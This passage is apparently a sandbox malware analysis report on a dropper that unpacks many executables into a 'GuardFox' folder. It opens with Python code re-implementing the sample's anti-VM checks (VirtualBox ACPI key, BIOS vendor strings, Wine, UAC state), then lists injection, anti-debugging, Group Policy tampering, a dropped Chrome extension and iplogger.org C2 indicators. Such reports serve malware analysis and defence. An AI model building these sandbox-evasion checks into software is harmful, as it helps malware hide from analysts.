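ACPI_VBOX = r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"
SYSTEM_BIOS = r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"
VIDEO_BIOS = r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"
ENABLE_LUA = (r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
              r"\Policies\System\EnableLUA")
WINE_SUFFIX = r"\Software\Wine"

# Vendor strings commonly found in hypervisor firmware. The report shows which
# values are read, not which substrings the sample compares against, so this
# list is an assumption.
VM_BIOS_MARKERS = ("VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "BOCHS", "PARALLELS")

# A snapshot maps a registry path to its data, or to None for a key that
# exists but carries no data of interest (the "Key opened" events).
Snapshot = Dict[str, Optional[str]]


@dataclass
class Verdict:
    virtualbox_acpi: bool = False
    bios_marker: Optional[str] = None
    wine: bool = False
    uac_enabled: bool = True
    reasons: List[str] = field(default_factory=list)

    @property
    def looks_like_analysis_env(self) -> bool:
        return self.virtualbox_acpi or self.bios_marker is not None or self.wine


def evaluate(snapshot: Snapshot) -> Verdict:
    reg = {k.lower(): v for k, v in snapshot.items()}  # registry paths are case-insensitive
    v = Verdict()

    # 1. Existence check: HKLM\HARDWARE\ACPI\DSDT\VBOX__ only appears when the
    #    firmware DSDT carries VirtualBox's OEM ID ("Key opened" in the report).
    if ACPI_VBOX.lower() in reg:
        v.virtualbox_acpi = True
        v.reasons.append("ACPI DSDT OEM id is VBOX__")

    # 2. Substring checks on the firmware version strings (REG_MULTI_SZ on a
    #    real host; joined into one string in this snapshot).
    for path in (SYSTEM_BIOS, VIDEO_BIOS):
        text = (reg.get(path.lower()) or "").upper()
        hit = next((m for m in VM_BIOS_MARKERS if m in text), None)
        if hit and v.bios_marker is None:
            v.bios_marker = hit
            value_name = path.rpartition("\\")[2]
            v.reasons.append(f"{value_name} contains {hit}")

    # 3. Wine creates HKCU\Software\Wine; Windows proper never does. The SID in
    #    the path varies per machine, so match on prefix and suffix only.
    if any(k.startswith("\\registry\\user\\") and k.endswith(WINE_SUFFIX.lower())
           for k in reg):
        v.wine = True
        v.reasons.append("HKCU\\Software\\Wine exists")

    # 4. EnableLUA is a REG_DWORD; 0 means UAC is off, so a later elevation
    #    will not prompt. A missing value means the default (enabled).
    lua = reg.get(ENABLE_LUA.lower())
    v.uac_enabled = lua is None or str(lua).strip() != "0"
    return v


# Constructed snapshots (not captured from the sandbox): a VirtualBox guest
# and a physical laptop, both with UAC on.
VIRTUALBOX_GUEST: Snapshot = {
    ACPI_VBOX: None,
    SYSTEM_BIOS: "VBOX   - 1 BIOS Date: 12/01/06 17:00:00 Ver: 08.00.02",
    VIDEO_BIOS: "Oracle VM VirtualBox Version 6.1.38 VGA BIOS",
    ENABLE_LUA: "1",
}
BARE_METAL: Snapshot = {
    SYSTEM_BIOS: "LENOVO - 1 N2HET55W (1.38 )",
    VIDEO_BIOS: "Intel Video BIOS",
    ENABLE_LUA: "1",
}

if __name__ == "__main__":
    for label, snap in (("virtualbox", VIRTUALBOX_GUEST), ("bare metal", BARE_METAL)):
        verdict = evaluate(snap)
        print(f"{label}: analysis_env={verdict.looks_like_analysis_env} "
              f"uac={verdict.uac_enabled} reasons={verdict.reasons}")
```

Each of the four probes is independent, which is why the report shows several of the dropped executables (setup.exe, rKlG0105_QMP5yCEVWPcwfwN.exe, Oo3P2P2VOFHTfbT2AUs5ehOf.exe, Install.exe) running some subset of them; a VM that fixes only the DSDT OEM ID but leaves "VBOX" in SystemBiosVersion still fails the second check.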

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1136 wrote to memory of 760 N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
PID 1136 wrote to memory of 760 N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
PID 1136 wrote to memory of 760 N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
PID 1136 wrote to memory of 1856 N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
PID 1136 wrote to memory of 1856 N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
PID 1136 wrote to memory of 1856 N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
PID 1136 wrote to memory of 2460 N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
PID 1136 wrote to memory of 2460 N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
PID 1136 wrote to memory of 2460 N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
PID 1136 wrote to memory of 2568 N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
PID 1136 wrote to memory of 2568 N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
PID 1136 wrote to memory of 2568 N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
PID 1136 wrote to memory of 4748 N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
PID 1136 wrote to memory of 4748 N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
PID 1136 wrote to memory of 4748 N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
PID 1136 wrote to memory of 3644 N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
PID 1136 wrote to memory of 3644 N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
PID 1136 wrote to memory of 3644 N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
PID 1136 wrote to memory of 2868 N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
PID 1136 wrote to memory of 2868 N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
PID 1136 wrote to memory of 2868 N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
PID 1136 wrote to memory of 5392 N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
PID 1136 wrote to memory of 5392 N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
PID 1136 wrote to memory of 5392 N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
PID 1856 wrote to memory of 5684 N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
PID 1856 wrote to memory of 5684 N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
PID 1856 wrote to memory of 5684 N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
PID 3644 wrote to memory of 5652 N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
PID 3644 wrote to memory of 5652 N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
PID 3644 wrote to memory of 5652 N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
PID 1136 wrote to memory of 5820 N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
PID 1136 wrote to memory of 5820 N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
PID 1136 wrote to memory of 5820 N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
PID 1136 wrote to memory of 5972 N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
PID 1136 wrote to memory of 5972 N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
PID 1136 wrote to memory of 5972 N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
PID 1136 wrote to memory of 5980 N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
PID 1136 wrote to memory of 5980 N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
PID 1136 wrote to memory of 5980 N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
PID 1136 wrote to memory of 6044 N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
PID 1136 wrote to memory of 6044 N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
PID 1136 wrote to memory of 6044 N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
PID 1136 wrote to memory of 6076 N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
PID 1136 wrote to memory of 6076 N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
PID 1136 wrote to memory of 6076 N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
PID 1136 wrote to memory of 6088 N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
PID 1136 wrote to memory of 6088 N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
PID 1136 wrote to memory of 6088 N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
PID 1136 wrote to memory of 2816 N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 1136 wrote to memory of 2816 N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 1136 wrote to memory of 2816 N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 1136 wrote to memory of 2972 N/A N/A C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
PID 1136 wrote to memory of 2972 N/A N/A C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
PID 1136 wrote to memory of 5096 N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
PID 1136 wrote to memory of 5096 N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
PID 1136 wrote to memory of 5096 N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
PID 1136 wrote to memory of 4316 N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
PID 1136 wrote to memory of 4316 N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
PID 1136 wrote to memory of 4316 N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
PID 2816 wrote to memory of 844 N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 2816 wrote to memory of 844 N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 2816 wrote to memory of 844 N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
